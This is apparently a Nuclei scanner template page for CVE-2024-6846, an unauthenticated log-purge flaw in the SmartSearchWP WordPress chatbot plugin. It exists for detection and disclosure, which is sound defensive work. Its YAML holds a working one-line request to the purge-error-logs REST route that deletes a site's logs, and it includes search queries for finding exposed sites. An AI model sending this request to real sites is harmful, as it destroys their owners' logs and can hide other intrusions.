SmartSearchWP <= 2.4.4 - Unauthenticated Log Purge
ID: CVE-2024-6846
Severity: medium
Author: s4e-io
Tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,smartsearchwp,chatgpt
Description
Section titled “Description”The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not validate access on some REST routes, allowing for an unauthenticated user to purge error and chat logs.
YAML Source
Section titled “YAML Source”id: CVE-2024-6846
info: name: SmartSearchWP <= 2.4.4 - Unauthenticated Log Purge author: s4e-io severity: medium description: | The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not validate access on some REST routes, allowing for an unauthenticated user to purge error and chat logs. reference: - https://wpscan.com/vulnerability/d48fdab3-669c-4870-a2f9-6c39a7c25fd8/ - https://nvd.nist.gov/vuln/detail/CVE-2024-6846 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2024-6846 metadata: max-request: 1 verified: true vendor: webdigit product: smartsearchwp framework: wordpress publicwww-query: "/wp-content/plugins/smartsearchwp" fofa-query: body="/wp-content/plugins/smartsearchwp" tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,smartsearchwp,chatgpt
http: - raw: - | POST /wp-json/wdgpt/v1/purge-error-logs HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"months":"1"}
matchers: - type: dsl dsl: - 'contains_all(body,"success","true", "purged successfully")' - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and# digest: 4a0a004730450221008b1f5cd8b5fbb099f01f66500b90a0372f2691a3cc31b15afb862f9e9e9ebf7d022068511475d22e94663c4753b725a50692b1181d73ed7b77af0592aa24b350811a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6846.yaml"